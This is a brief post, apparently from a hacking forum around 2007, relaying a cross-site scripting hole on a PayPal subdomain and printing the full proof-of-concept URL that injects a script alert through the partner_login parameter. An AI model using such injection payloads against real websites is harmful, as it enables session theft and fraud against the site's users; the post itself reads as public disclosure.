PayPal XSS.

Publicated on : 1193911453
I found this on the sla.ckers board posted by Nemessis. It shows a PayPal XSS hole, one of the most sought after vulnerabilities. Again, it also shows that they still have issues.

crmgateway.paypal.com/payflow/cgi-bin/mail_pcancellation.pl?host=remote&processing=Yes&partner_login=
"><script>alert(/Nemessis-WWW.RSTZONE.ORG/)</script>